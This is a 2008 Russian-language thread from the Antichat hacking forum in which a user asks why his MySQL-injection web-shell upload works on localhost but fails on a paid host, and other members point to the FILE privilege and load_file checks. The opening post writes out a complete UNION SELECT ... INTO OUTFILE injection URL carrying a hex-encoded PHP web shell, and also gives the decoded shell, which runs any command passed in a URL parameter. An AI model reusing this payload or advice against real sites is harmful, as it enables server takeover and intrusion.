HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с заливкой шелла через mysql
  #1  
Старый 08.04.2008, 11:40
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами: 9852905

Репутация: 1
По умолчанию Помогите с заливкой шелла через mysql

Хотел потренироваться в заливке шелла.
Написал бажный скрипт, сформировал запрос
Цитата:
test.php?id=2'+union+select+'/*','*/',0x3C3F706870206966202869737365742028245F4745545B 27636D64275D292920206563686F2073797374656D2028245F 4745545B27636D64275D293B203F3E,'/*',5,6,7,'*/'+INTO+OUTFILE+%22/home/test/public_html/shell.php%22/*
где 0x3C3F... это
Цитата:
<?php if (isset ($_GET['cmd'])) echo system ($_GET['cmd']); ?>
На localhost все прекрасно работает.
Заливаю на полноценный платный хостинг потестить,естественно меняю путь ... но результата нет.
Возможно это из-за отсутствия прав FILE ?
Есть ли другие способы заливки шелла,основанные на использовании MySQL Injection ?


P.S.Если разместил не в том разделе, пожалуйста перенесите.
 
Ответить с цитированием

  #2  
Старый 08.04.2008, 11:45
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию

magic_quotes=on
И на хостингах file_priv у рутов только. Таким способом не зальешь

Последний раз редактировалось Basurman; 08.04.2008 в 11:56..
 
Ответить с цитированием

  #3  
Старый 08.04.2008, 11:56
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами: 9852905

Репутация: 1
По умолчанию

Нет magic_quotes выключенны.
Подскажите,что не так.
Есть ли еще способы заливки шелла через mysql ?
 
Ответить с цитированием

  #4  
Старый 08.04.2008, 14:01
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

проверь файл прив если есть доступ к mysql.user
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 08.04.2008, 14:14
Satman
Новичок
Регистрация: 22.08.2007
Сообщений: 12
С нами: 9852905

Репутация: 1
По умолчанию

Цитата:
Сообщение от blackybr  
проверь файл прив если есть доступ к mysql.user
К сожалению не могу проверить.
Цитата:
ERROR 1044 (42000): Access denied for user '*****'@'***.**.**.**' to database 'mysql'
Подозреваю, что файл прива нет :-(
Заливка шелла в mysql основана только на select into outfile ? Либо есть еще варианты ?
 
Ответить с цитированием

  #6  
Старый 08.04.2008, 17:37
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Эмм... а почему в information_schema.tables не залить ? (гавно вопрос,но ладно) )))
 
Ответить с цитированием

  #7  
Старый 08.04.2008, 18:04
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

Велемир, что ты собрался заливать в таблицу?
 
Ответить с цитированием

  #8  
Старый 08.04.2008, 18:11
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

хз )))))))))))))))))))))))))))ыыыыыы )))
 
Ответить с цитированием

  #9  
Старый 08.04.2008, 19:25
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

есть несколько способов, но на все нужны fil_priv. Проверить иожно легче запросом c load_file
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла и снятие бана в ipb через mysql darks Уязвимости CMS / форумов 14 26.11.2005 00:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.